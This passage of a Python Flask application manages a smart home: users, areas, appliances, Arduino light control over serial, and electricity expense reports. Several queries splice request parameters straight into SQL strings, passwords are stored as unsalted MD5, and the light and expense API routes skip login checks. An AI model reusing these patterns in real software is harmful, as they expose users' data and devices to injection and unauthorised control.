return redirect(url_for('login'))
areaList = getActiveAreas()
applianceList = getActiveAppliances()
temperaturejson = JSON.loads(getTemperatura())['temperature']
temperature = temperaturejson['value']
humidity = JSON.loads(getHumedad())['humidity']['value']
currentExpense = JSON.loads(getCurrentMonthExpense())
locale.setlocale(locale.LC_ALL, 'an_ES.UTF-8')
totalExpense = locale.format("%d", (currentExpense['totalExpense']), grouping=True)
print("TEMP"+temperature)
alarmStatus = getAlarmStatus()
return render_template('dashboard.html',areas=areaList,appliances=applianceList,currentExpense=totalExpense,alarmStatus=alarmStatus,temperature=temperature,humidity=humidity,userLogged=session.get('userLogged'))
def getActiveAreas():
conn = engine.connect()
#cursor= conn.cursor()
queryArea="select * from area where status = '{activo}'".format(activo=1)
area_list = []
print(len(area_list))
area_rows=conn.execute(queryArea)
#area_rows=cursor.fetchall()
for row in area_rows:
area = collections.OrderedDict()
area['id'] = row[0]
area['name'] = row[1]
area['quantity'] = row[2]
area['creation_date'] = str(row[3])
area['status'] = row[4]
area['house_id'] = row[5]
print()
area_list.append(area)
conn.close()
print(len(area_list))
if len(area_list) > 0 and area_list != None:
return area_list
else:
area_list.append("No hay elementos.")
return area_list
def getActiveAppliances():
conn = engine.connect()
queryAppliance="select * from appliance where status = '{activo}'".format(activo=1)
appliance_list = []
appliance_rows=conn.execute(queryAppliance)
#appliance_rows=cursor.fetchall()
for row in appliance_rows:
appliance = collections.OrderedDict()
appliance['id'] = row[0]
appliance['name'] = row[1]
appliance['power'] = row[2]
appliance['description'] = str(row[3])
appliance['fee'] = row[4]
appliance['status'] = row[5]
appliance_list.append(appliance)
conn.close()
if len(appliance_list) > 0 and appliance_list != None:
return appliance_list
else:
appliance_list.append("No hay elementos.")
return appliance_list
#======== User services ============
@app.route("/user_index")
def userIndex():
userRole = session.get('userRole')
userCodeRole = isRoleValid(userRole)
print(userRole)
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
conn = engine.connect()
query = "select * from user u inner join role r on r.id=u.role_id"
rows=conn.execute(query)
conn.close()
#rows = cursor.fetchall()
objects_list = []
for row in rows:
d = collections.OrderedDict()
d['id'] = row[0]
d['name'] = row[1]
d['lastname'] = row[2]
d['user'] = row[3]
d['mail'] = str(row[5]) #datetime.strftime("%Y-%m-%d %H:%M:%S")
#d['creation_date'] = row[6].strftime("%Y-%m-%d %H:%M:%S")
d['birthdate'] = str(row[6])
d['creationDate'] = str(row[7])
d['status'] = row[8]
d['phone'] = row[9]
#d['role_id'] = row[9]
#objects_list.append(d)
# role = collections.OrderedDict()
# role['id'] = 1
# role['name'] = "admin"
# d['role'] = role
d['roleName'] = row[12]
objects_list.append(d)
#print(objects_list)
#conn.close
#usr = {'name': 'gabi', 'lastname': 'cabrera' }
if rows != None:
return render_template('user_index.html',users=objects_list,userLogged=session.get('userLogged'))
else:
return render_template('user_index.html',"lista vacia")
@app.route("/sign_up")
def singUp():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
return render_template('sign_up.html',userLogged=session.get('userLogged'))
@app.route("/create_user", methods=['POST'])
def createUser():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
name=request.form['name']
lastName=request.form['last-name']
user=request.form['user']
password=request.form['password']
passHash=hashlib.md5(password.encode())
convertedPass=passHash.hexdigest()
phone=request.form['phone']
email=request.form['email']
roleId=request.form['user-role']
birthDate=request.form['birthdate']
status=request.form['user-active-radio']
# birthDate="2016-01-01"
creationDate= time.strftime("%Y-%m-%d")
query="insert into user (name,lastname,user,password,mail,birth_date,creation_date,status,phone,role_id) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
conn = engine.connect()
data= conn.execute(query,(name,lastName,user,convertedPass,email,birthDate,creationDate,status,phone,roleId))
#data=cursor.execute(query,("gabi","cabrera","gabi","123","fasdfa","2016-10-23","2016-01-02",1,"123456",1))
#conn.commit()
conn.close()
msg = collections.OrderedDict()
if data !=None:
print("create user")
msg['status'] = 1
msg['msg'] = "user successful created"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not created"
res = JSON.dumps(msg)
return res
@app.route("/user_edit", methods=['GET'])
def userEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
user_id = request.args.get('userId')
d = collections.OrderedDict()
query="select * from user u inner join role r on r.id=u.role_id where u.id = '{id}' ".format(id=user_id)
conn = engine.connect()
rows=conn.execute(query)
conn.close()
#rows=cursor.fetchall()
#print(row)
user = collections.OrderedDict()
for row in rows:
user['id'] = row[0]
user['name'] = row[1]
user['lastname'] = row[2]
user['user'] = row[3]
user['password'] = row[4]
user['mail'] = str(row[5]) #datetime.strftime("%Y-%m-%d %H:%M:%S")
#d['creation_date'] = row[6].strftime("%Y-%m-%d %H:%M:%S")
user['birthdate'] = str(row[6])
user['status'] = row[8]
user['phone'] = row[9]
#objects_list.append(d)
#role = collections.OrderedDict()
#role['id'] = row[12]
#role['name'] = row[13]
user['roleId'] = row[11]
user['roleName'] = row[12]
return render_template('user_edit.html',user=user,userLogged=session.get('userLogged'))
@app.route("/user_edit", methods=['POST'])
def userSubmitEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
id=request.form['user-id']
name=request.form['name']
lastName=request.form['last-name']
user=request.form['user']
password=request.form['password']
phone=request.form['phone']
email=request.form['email']
roleId=request.form['user-role']
birthDate=request.form['birthdate']
status=request.form['user-status']
passHash=hashlib.md5(password.encode())
convertedPass=passHash.hexdigest()
conn = engine.connect()
session.get('userLogged')
queryPass="select password from user where id = '{id}'".format(id=id)
rowPass=conn.execute(queryPass)
conn.close()
#rowPass=cursor.fetchall()
psw = ""
for row in rowPass:
psw = row[0]
updatePass = password
if psw != password:
updatePass = convertedPass
#query="insert user (id,name,lastname,user,password,mail,birth_date,creation_date,status,phone,role_id) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
conn = engine.connect()
data = conn.execute("""UPDATE user SET name=%s, lastname=%s, user=%s, password=%s, mail=%s, birth_date=%s, status=%s, phone=%s, role_id=%s WHERE id=%s""", (name, lastName, user, updatePass, email, birthDate, status, phone, roleId, id))
#data= cursor.execute(query,(id,name,lastName,user,password,email,birthDate,status,phone,roleId))
#conn.commit()
conn.close()
#conn.close
msg = collections.OrderedDict()
if data!=None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
#=============== Area services =============
@app.route("/area_index")
def areaIndex():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
d = collections.OrderedDict()
query="select * from area"
objects_list = []
conn = engine.connect()
rows=conn.execute(query)
conn.close()
#rows=cursor.fetchall()
#print(row)
for row in rows:
area = collections.OrderedDict()
area['id'] = row[0]
area['name'] = row[1]
area['quantity'] = row[2]
area['creation_date'] = str(row[3])
area['status'] = row[4]
area['house_id'] = row[5]
objects_list.append(area)
return render_template('area_index.html',areas = objects_list,userLogged=session.get('userLogged'))
@app.route("/area_create",methods=['GET'])
def registerArea():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
return render_template('area_create.html',userLogged=session.get('userLogged'))
@app.route("/area_create", methods=['POST'])
def submitArea():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
name=request.form['name']
# quantity=request.form['quantity']
status=request.form['area-status-radio']
#description=request.form['description']
creationDate=time.strftime("%Y-%m-%d");
house_id=1;
query="insert into area (name,creation_date,status,house_id) values (%s,%s,%s,%s)"
conn = engine.connect()
data= conn.execute(query,(name,creationDate,status,house_id))
#conn.commit()
conn.close()
msg = collections.OrderedDict()
if data !=None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
@app.route("/area_edit",methods=['GET'])
def areaEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
area_id = request.args.get('areaId')
d = collections.OrderedDict()
query="select * from area a where a.id = '{id}' ".format(id=area_id)
conn = engine.connect()
rows=conn.execute(query)
#rows=cursor.fetchall()
area = collections.OrderedDict()
conn.close()
for row in rows:
area['id'] = row[0]
area['name'] = row[1]
# area['quantity'] = row[2]
area['status'] = row[4]
return render_template('area_edit.html',area=area,userLogged=session.get('userLogged'))
@app.route("/area_edit",methods=['POST'])
def areaSubmitEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
id=request.form['area-id']
name=request.form['name']
# quantity=request.form['quantity']
status=request.form['area-active-radio']
conn = engine.connect()
data = conn.execute("""UPDATE area SET name=%s, status=%s WHERE id=%s""", (name, status, id))
#conn.commit()
conn.close()
msg = collections.OrderedDict()
if data != None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
#================= Appliance services ===============
@app.route("/appliance_index")
def applianceIndex():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
d = collections.OrderedDict()
query="select ap.id, ap.name, ap.power, ap.fee, ap.description, ap.status, ap.creation_date, s.name, a.name, apt.name from appliance ap inner join sensor s on ap.sensor_id=s.id inner join area a on ap.area_id=a.id inner join appliance_type apt on ap.appliance_type_id=apt.id;"
objects_list = []
conn = engine.connect()
rows=conn.execute(query)
#rows=cursor.fetchall()
#print(row)
conn.close()
for row in rows:
appliance = collections.OrderedDict()
appliance['id'] = row[0]
appliance['name'] = row[1]
appliance['power'] = row[2]
appliance['fee'] = row[3]
appliance['description'] = row[4]
appliance['status'] = row[5]
appliance['creation_date'] = str(row[6])
appliance['sensor'] = row[7]
appliance['area'] = row[8]
appliance['type'] = row[9]
objects_list.append(appliance)
return render_template('appliance_index.html',appliances=objects_list,userLogged=session.get('userLogged'))
@app.route("/appliance_create",methods=['GET'])
def registerAppliance():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
#cursor= conn.cursor()
queryArea="select * from area"
area_list = []
conn = engine.connect()
area_rows=conn.execute(queryArea)
#area_rows=cursor.fetchall()
for row in area_rows:
area = collections.OrderedDict()
area['id'] = row[0]
area['name'] = row[1]
area_list.append(area)
conn.close()
conn = engine.connect()
queryApplianceType="select * from appliance_type"
appliance_type_list = []
appliance_type_rows=conn.execute(queryApplianceType)
#appliance_type_rows=cursor.fetchall()
for row in appliance_type_rows:
appliance_type = collections.OrderedDict()
appliance_type['id'] = row[0]
appliance_type['name'] = row[1]
appliance_type_list.append(appliance_type)
conn.close()
conn = engine.connect()
querySensor="select * from sensor"
sensor_list = []
sensor_rows=conn.execute(querySensor)
#sensor_rows=cursor.fetchall()
for row in sensor_rows:
sensor = collections.OrderedDict()
sensor['id'] = row[0]
sensor['name'] = row[1] + ", " + row[2]
sensor_list.append(sensor)
conn.close()
#cursor= conn.cursor()
return render_template('appliance_create.html',areas=area_list,sensors=sensor_list,appliance_types=appliance_type_list,userLogged=session.get('userLogged'))
@app.route("/appliance_create",methods=['POST'])
def submitAppliance():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
name=request.form['name']
power=request.form['power']
# fee=request.form['fee']
status=request.form['appliance-status-radio']
description=request.form['description']
creationDate=time.strftime("%Y-%m-%d")
sensor_id=request.form['sensor']
area_id=request.form['area']#4;
appliance_type_id=request.form['type-appliance']#1;
conn = engine.connect()
query="insert into appliance (name,power,description,status,creation_date,sensor_id,area_id,appliance_type_id) values (%s,%s,%s,%s,%s,%s,%s,%s)"
data= conn.execute(query,(name,power,description,status,creationDate,sensor_id,area_id,appliance_type_id))
#conn.commit()
conn.close()
conn = engine.connect()
queryApplianceQuantity = "select a.appliance_quantity from area a inner join appliance ap on a.id = ap.area_id where ap.area_id = '{id}' ".format(id=area_id)
print(queryApplianceQuantity)
applianceQuantity = conn.execute(queryApplianceQuantity).scalar() or 0  # fetch a number, not a ResultProxy, so the +1 below works
conn.close()
conn = engine.connect()
newQuantity = applianceQuantity + 1
print(newQuantity)
dataUpdateArea = conn.execute("""UPDATE area SET appliance_quantity=%s WHERE id=%s""", (newQuantity, area_id))
print(dataUpdateArea)
#conn.commit()
conn.close()
#conn.close
msg = collections.OrderedDict()
if data !=None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
@app.route("/appliance_edit",methods=['GET'])
def applianceEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
return redirect(url_for('login'))
appliance_id = request.args.get('applianceId')
conn = engine.connect()
query="select ap.id, ap.name, ap.power, ap.fee, ap.description, ap.status, ap.creation_date, s.id, a.id, apt.id from appliance ap inner join sensor s on ap.sensor_id=s.id inner join area a on ap.area_id=a.id inner join appliance_type apt on ap.appliance_type_id=apt.id where ap.id = '{id}'; ".format(id=appliance_id)
appliance_rows=conn.execute(query)
conn.close()
appliance = collections.OrderedDict()
print(appliance_rows)
for row in appliance_rows:
appliance['id'] = row[0]
appliance['name'] = row[1]
appliance['power'] = row[2]
# appliance['fee'] = row[3]  (not editable)
appliance['description'] = row[4]
appliance['status'] = row[5]
appliance['creation_date'] = str(row[6])
appliance['sensorId'] = row[7]
appliance['areaId'] = row[8]
appliance['typeId'] = row[9]
#cursor.close()
conn = engine.connect()
queryArea="select * from area"
area_list = []
area_rows=conn.execute(queryArea)
#area_rows=cursor.fetchall()
for row in area_rows:
area = collections.OrderedDict()
area['id'] = row[0]
area['name'] = row[1]
area_list.append(area)
conn.close()
conn = engine.connect()
queryApplianceType="select * from appliance_type"
appliance_type_list = []
appliance_type_rows=conn.execute(queryApplianceType)
#appliance_type_rows=cursor.fetchall()
for row in appliance_type_rows:
appliance_type = collections.OrderedDict()
appliance_type['id'] = row[0]
appliance_type['name'] = row[1]
appliance_type_list.append(appliance_type)
conn.close()
conn = engine.connect()
querySensor="select * from sensor"
sensor_list = []
sensor_rows=conn.execute(querySensor)
#sensor_rows=cursor.fetchall()
for row in sensor_rows:
sensor = collections.OrderedDict()
sensor['id'] = row[0]
sensor['name'] = row[1] + ", " + row[2]
sensor_list.append(sensor)
conn.close()
#cursor= conn.cursor()
return render_template('appliance_edit.html',appliance=appliance,areas=area_list,sensors=sensor_list,appliance_types=appliance_type_list,userLogged=session.get('userLogged'))
@app.route("/appliance_edit",methods=['POST'])
def submitApplianceEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
id=request.form['appliance-id']
name=request.form['name']
power=request.form['power']
# fee=request.form['fee']  (not editable)
status=request.form['appliance-status-radio']
description=request.form['description']
#creationDate=time.strftime("%Y-%m-%d")
sensor_id=request.form['sensor']
area_id=request.form['area']#4;
appliance_type_id=request.form['type-appliance']#1;
#Fetch the current area_id to check whether the area was changed, so appliance_quantity can be adjusted in both areas involved
conn = engine.connect()
queryCurrentAreaId = "select ap.area_id from appliance ap where ap.id = '{id}' ".format(id=id)
currentAreaId = 0
currentArea_rows=conn.execute(queryCurrentAreaId)
#currentArea_rows=cursor.fetchall()
print(currentArea_rows)
for row in currentArea_rows:
currentAreaId = row[0]
conn.close()
# print(currentAreaId)
#updateAppQuantity = False
conn = engine.connect()
data = conn.execute("""UPDATE appliance SET name=%s, power=%s, status=%s, description=%s, sensor_id=%s, area_id=%s, appliance_type_id=%s WHERE id=%s""", (name, power, status, description, sensor_id, area_id, appliance_type_id, id))
conn.close()
# print(area_id)
#FIXME: this branch is entered when it should not be
if (str(currentAreaId) != area_id):
#Fetch the appliance quantity to increment in the new area.
conn = engine.connect()
queryApplianceQuantitySumar = "select a.appliance_quantity from area a inner join appliance ap on a.id = ap.area_id where ap.area_id = '{id}' ".format(id=area_id)
applianceQuantitySumar = 0
quantitySuma_rows=conn.execute(queryApplianceQuantitySumar)
#quantitySuma_rows=cursor.fetchall()
for row in quantitySuma_rows:
applianceQuantitySumar = row[0]
print(applianceQuantitySumar)
conn.close()
#Update appliance_quantity on the area the appliance is moved to.
conn = engine.connect()
newQuantitySumar = applianceQuantitySumar + 1
print("quantity suma: ")
print(newQuantitySumar)
dataUpdateAreaSuma = conn.execute("""UPDATE area SET appliance_quantity=%s WHERE id=%s""", (newQuantitySumar, area_id))
print(dataUpdateAreaSuma)
conn.close()
#Fetch the appliance quantity to decrement in the old area.
conn = engine.connect()
queryApplianceQuantityRestar = "select a.appliance_quantity from area a inner join appliance ap on a.id = ap.area_id where ap.area_id = '{id}' ".format(id=currentAreaId)
applianceQuantityRestar = 0
quantityResta_rows=conn.execute(queryApplianceQuantityRestar)
#quantityResta_rows=conn.fetchall()
for row in quantityResta_rows:
applianceQuantityRestar = row[0]
print(applianceQuantityRestar)
conn.close()
#Update appliance_quantity on the area the appliance is removed from.
conn = engine.connect()
newQuantityRestar = applianceQuantityRestar - 1
print("quantity resta: ")
print(newQuantityRestar)
dataUpdateAreaResta = conn.execute("""UPDATE area SET appliance_quantity=%s WHERE id=%s""", (newQuantityRestar, currentAreaId))
conn.close()
# conn.commit()
#cursor.close()
msg = collections.OrderedDict()
if data != None:
msg['status'] = 1
msg['msg'] = "user successful edited"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not edited"
res = JSON.dumps(msg)
return res
#Helper to check whether the user's role is admin or family.
def isRoleValid(userRole):
query = "select code from role where code = '{admin}' or code='{family}'".format(admin='A',family='F')
conn = engine.connect()
codeRow=conn.execute(query)
#codeRow = cursor.fetchall()
role = False
userCodeRole = ""
for code in codeRow:
if userRole == code[0]:
role = True
break
# userCodeRole = code[0]
conn.close()
return role
#Helper to check whether the user's role is admin.
def isRoleAdmin():
userRole = session.get('userRole')
query = "select code from role where code = '{admin}'".format(admin='A')
conn = engine.connect()
codeRow=conn.execute(query)
#codeRow = cursor.fetchall()
print(codeRow)
roleAdmin = ""
for code in codeRow:
roleAdmin = code[0]
conn.close()
if roleAdmin == userRole:
return True
else:
return False
#========= Tasks services ===========
@app.route("/task_index")
def taskIndex():
userRole = session.get('userRole')
userCodeRole = isRoleValid(userRole)
print(userRole)
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
areasList = getActiveAreas()
# cursor = conn.cursor()
# query = "select * from task"
# cursor.execute(query)
# cursor.close()
# rows = cursor.fetchall()
# objects_list = []
# for row in rows:
# d = collections.OrderedDict()
# d['id'] = row[0]
# d['name'] = row[1]
# d['description'] = row[2]
# d['creationDate'] = str(row[3])
# d['time'] = str(row[4])
# d['status'] = row[5]
# objects_list.append(d)
# cursor.close()
#conn.commit()
#print(objects_list)
#conn.close
if areasList != None:
return render_template('task_index.html',areas= areasList,userLogged=session.get('userLogged'))
else:
return render_template('task_index.html',"lista vacia")
#API
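# Light control endpoint: the "action" query parameter is translated into a
# serial command (status / LIGHT_ON_L1 / LIGHT_OFF_L1 / LIGHT_ON_L2 /
# LIGHT_OFF_L2) and mirrored in the "transaction" table so the expense queries
# below can compute usage from datetime_on/datetime_off. Note the timestamps
# use %I (12-hour clock without an AM/PM marker), so on/off pairs that
# straddle noon or midnight can be ambiguous.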
@app.route("/arduino/lights", methods=['GET'])
def arduinoLights():
status_light="error"
action = request.args.get('action')
appliance_id = request.args.get('appliance_id')
transactionId = 0
json = collections.OrderedDict()
status=0
if action=='status':
print("status")
ser.write('status')
status_light=ser.readline()
#while True:
print(status_light)
if action=='light_on_l1':
print("light_on lamp 1")
ser.write('LIGHT_ON_L1')
status_light='light_on_l1'
if action=='light_off_l1':
print('light_off lamp 1')
ser.write('LIGHT_OFF_L1')
status_light='light_off_l1'
if action=='light_on_l2':
print("light_on lamp 2")
ser.write('LIGHT_ON_L2')
status_light='light_on_l2'
if action=='light_off_l2':
print('light_off lamp 2')
ser.write('LIGHT_OFF_L2')
status_light='light_off_l2'
conn = engine.connect()
rows=conn.execute("select id from transaction where appliance_id = {appliance_id} and status = {status}".format(appliance_id=appliance_id,status=status))
#rows = cursor.fetchall()  # checks whether the light is already on
conn.close()
for row in rows:
transactionId=row[0]
if transactionId!=0:#if the light is already on and the action is light_off, mark it as switched off
if action=='light_off_l1' or action=='light_off_l2':
conn = engine.connect()
conn.execute("""UPDATE transaction SET datetime_off=%s,status=%s WHERE id = %s""", (time.strftime("%Y-%m-%d %I:%M:%S"),1,transactionId))
#conn.commit()
conn.close()
else:
if action=='light_on_l1' or action=='light_on_l2':#insert only when the action switches a light on
conn = engine.connect()
query="insert into transaction ( name , datetime_on , status , appliance_id,datetime_off ) values (%s,%s,%s,%s,%s)"
data= conn.execute(query,("lampara", time.strftime("%Y-%m-%d %I:%M:%S"),0, appliance_id,None))
#conn.commit()
conn.close()
if status_light=='light_on_l1' or status_light=='light_off_l1' or status_light=='light_on_l2'or status_light=='light_off_l2':
json["status"] = 1
json["msg"] = status_light
return jsonify(json)
@app.route("/getCurrentMonthExpense", methods=['GET'])
def getCurrentMonthExpense():
conn = engine.connect()
query="select (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense from transaction t inner join appliance a on t.appliance_id=a.id where month(datetime_off)=month(now()) and year(datetime_off)=year(now())"
data= conn.execute(query)
#rows = cursor.fetchall()
json = collections.OrderedDict()
totalExpense=0
for row in data:
totalExpense+=row[0]
json["msg"] = "ok"
json["status"] = 1
json["totalExpense"] = int(totalExpense)
conn.close()
return JSON.dumps(json)
@app.route("/get_expense_by_area", methods=['POST'])
def getExpenseByArea():
conn = engine.connect()
start_date = request.form['start_date']
end_date = request.form['end_date']
area_id = request.form['area_id']
json = collections.OrderedDict()
query="select areaExpense('"+start_date+"','"+end_date+"',"+area_id+")"
rows= conn.execute(query)
#rows = cursor.fetchall()
for row in rows:
json["status"] = 1
json["result"] = row[0]
conn.close()
return jsonify(json)
@app.route("/get_expense_by_appliance", methods=['POST'])
def getExpenseByAppliance():
conn = engine.connect()
start_date = request.form['start_date']
end_date = request.form['end_date']
appliance_id = request.form['appliance_id']
json = collections.OrderedDict()
query="select applianceExpense('"+start_date+"','"+end_date+"',"+appliance_id+")"
rows= conn.execute(query)
#rows = cursor.fetchall()
for row in rows:
json["status"] = 1
json["result"] = row[0]
conn.close()
return jsonify(json)
@app.route("/get_total_expense", methods=['POST'])
def getTotalExpense():
conn = engine.connect()
start_date = request.form['start_date']
end_date = request.form['end_date']
json = collections.OrderedDict()
print(end_date)
print(start_date)
query="select totalExpense('"+start_date+":00:00','"+end_date+":23:59')"
rows= conn.execute(query)
#rows = cursor.fetchall()
for row in rows:
json["status"] = 1
json["result"] = row[0]
conn.close()
return jsonify(json)
@app.route("/get_monthly_expense_by_area", methods=['GET'])
def get_monthly_expense_by_area():
conn = engine.connect()
status=1
msg='success'
month_num = request.args.get('month')
if (month_num==None or month_num.strip()==""):
query="select sum(TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense,ar.name as area_name from transaction t inner join appliance a on t.appliance_id=a.id inner join area ar on ar.id=a.area_id where month(datetime_off)=month(now()) and year(datetime_off)=year(now()) group by ar.name;"
else:
query="select sum(TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense,ar.name as area_name from transaction t inner join appliance a on t.appliance_id=a.id inner join area ar on ar.id=a.area_id where month(datetime_off)="+month_num+" and year(datetime_off)=year(now()) group by ar.name;"
json = collections.OrderedDict()
obj = collections.OrderedDict()
rows= conn.execute(query)
#rows = cursor.fetchall()
expense_list = []
for row in rows:
obj = collections.OrderedDict()
obj["expense"] = row[0]
obj["area_name"] = row[1]
expense_list.append(obj)
conn.close()
json['status']=status
json['msg']=msg
json['expense_list']=expense_list
return jsonify(json)
@app.route("/get_monthly_expense_by_appliance", methods=['GET'])
def get_monthly_expense_by_appliance():
conn = engine.connect()
month_num = request.args.get('month')
if (month_num==None or month_num.strip()==""):
month_num="month(now())"
json = collections.OrderedDict()
query="select sum(TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense,a.name as area_name from transaction t inner join appliance a on t.appliance_id=a.id where month(datetime_off)="+month_num+" group by a.name;"
rows= conn.execute(query)
#rows = cursor.fetchall()
server_list = []
for row in rows:
json = collections.OrderedDict()
json["expense"] = row[0]
json["appliance_name"] = row[1]
server_list.append(json)
conn.close()
return JSON.dumps(server_list)
@app.route("/get_monthly_expenses", methods=['GET'])
def get_monthly_expenses():
conn = engine.connect()
year = request.args.get('year')
if year == None or year =="":
year="year(now())"
json = collections.OrderedDict()
query="""select IFNULL(sum(case when month(datetime_off)=1 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Enero,
IFNULL(sum(case when month(datetime_off)=2 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Febrero,
IFNULL(sum(case when month(datetime_off)=3 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Marzo,
IFNULL(sum(case when month(datetime_off)=4 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Abril,
IFNULL(sum(case when month(datetime_off)=5 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Mayo,
IFNULL(sum(case when month(datetime_off)=6 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Junio,
IFNULL(sum(case when month(datetime_off)=7 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Julio,
IFNULL(sum(case when month(datetime_off)=8 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Agosto,
IFNULL(sum(case when month(datetime_off)=9 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Septiembre,
IFNULL(sum(case when month(datetime_off)=10 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Octubre,
IFNULL(sum(case when month(datetime_off)=11 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Noviembre,
IFNULL(sum(case when month(datetime_off)=12 then (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee end),0) As Diciembre
from transaction t inner join appliance a on t.appliance_id=a.id where EXTRACT(YEAR FROM datetime_off)="""+year
rows= conn.execute(query)
#rows = cursor.fetchall()
server_list = []
for row in rows:
json = collections.OrderedDict()
json["month"] = "Enero"
json["expense"] = row[0]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Febrero"
json["expense"] = row[1]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Marzo"
json["expense"] = row[2]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Abril"
json["expense"] = row[3]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Mayo"
json["expense"] = row[4]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Junio"
json["expense"] = row[5]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Julio"
json["expense"] = row[6]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Agosto"
json["expense"] = row[7]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Septiembre"
json["expense"] = row[8]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Octubre"
json["expense"] = row[9]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Noviembre"
json["expense"] = row[10]
server_list.append(json)
json = collections.OrderedDict()
json["month"] = "Diciembre"
json["expense"] = row[11]
server_list.append(json)
conn.close()
return JSON.dumps(server_list)
@app.route("/get_all_expenses", methods=['GET'])
def get_all_expenses():
conn = engine.connect()
json = collections.OrderedDict()
query="""select datetime_on,datetime_off, (TIMESTAMPDIFF(SECOND,datetime_on, datetime_off)/60/60)*power*fee as expense,a.name,ar.name,
CONCAT( MOD(HOUR(TIMEDIFF(datetime_on,datetime_off)), 24), ':',
MINUTE(TIMEDIFF(datetime_on, datetime_off)), ':',
SECOND(TIMEDIFF(datetime_on, datetime_off)), '')
AS TimeDiff
from transaction t inner join appliance a on t.appliance_id=a.id inner join area ar on ar.id=a.area_id order by t.datetime_on"""
rows= conn.execute(query)
#rows = cursor.fetchall()
server_list = []
for row in rows:
json = collections.OrderedDict()
json["datetime_on"] = str(row[0])
json["datetime_off"] = str(row[1])
json["expense"] = row[2]
json["appliance_name"] = row[3]
json["area_name"] = row[4]
json["duration"] = str(row[5])
server_list.append(json)
conn.close()
return JSON.dumps(server_list)
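# Scheduled tasks: creating a task stores it in the "task" table and starts a
# background thread (daemon2 for switching a light on, daemon3 for switching
# it off) that polls the clock and writes the matching serial command when the
# stored HH:MM is reached, then flags the task as processed (status=0).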
